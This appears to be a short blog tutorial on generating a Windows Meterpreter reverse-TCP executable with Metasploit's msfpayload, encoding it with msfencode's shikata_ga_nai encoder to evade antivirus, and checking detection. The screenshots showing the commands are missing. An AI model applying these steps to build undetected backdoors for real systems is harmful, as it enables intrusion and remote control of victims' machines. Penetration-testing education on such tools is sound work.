Bypassing AV (Anti-Virus)
msfpayload
In the final phase of the exploit process involves the creation and encoding of a payload that will be inserted into the attack string and sent to the target to be executed. A payload that achieve a specific result on the target host such as executing a command or opening a listening connection that returns a shell. One of the most powerfull features of the metasploit is its ability to automatically generate architecture and operating system specific shellcode. msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. Shellcode can be generate in many formats including C, Ruby, JavaScript and even Visual Basic for applications.
There is list of available Payloads.
 |
| List |
The next step is to determine the required payload variables by passing the S option along with windows/meterpreter/reverse_tcp argument to msfpayload. This display the payload information.
 | |
| Description |
The LPORT already have default values 4444for listening port on the target for an incoming connection. To generate payloads, we simply specify the LHOST and LPORT for listening connections. In this session I will try to make the executable file with name newbiemoron.exe.
 | |
| Making File |
After generate shellcode, find where the location of the shellcode with the name newbiemoron.
 |
| Locate file |
To attacking the target you must use your attack vector.
msfencode
Metasploit's msfencode tool handles the erntire encoding process of taking a payload and modifying its contents. It is one of the best ways to avoid being stopped by antivirus software.
 |
| msfencode |
To use the msfencode you can read the manual or help menu.
 | |
| help menu |
We add the R flag at to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode . We specify the x86/shikata_ga_nai encoder at and tell msfencode to send the executable output -t exe to /var/www/newbiemoronX.exe .
 |
| msfpayload and msfencode |
Lets see the AV (anti-virus) detect the file normally
 |
| bypass Av |
Read the next chapter for the example to exploit and backdooring windows...
0 comments:
Post a Comment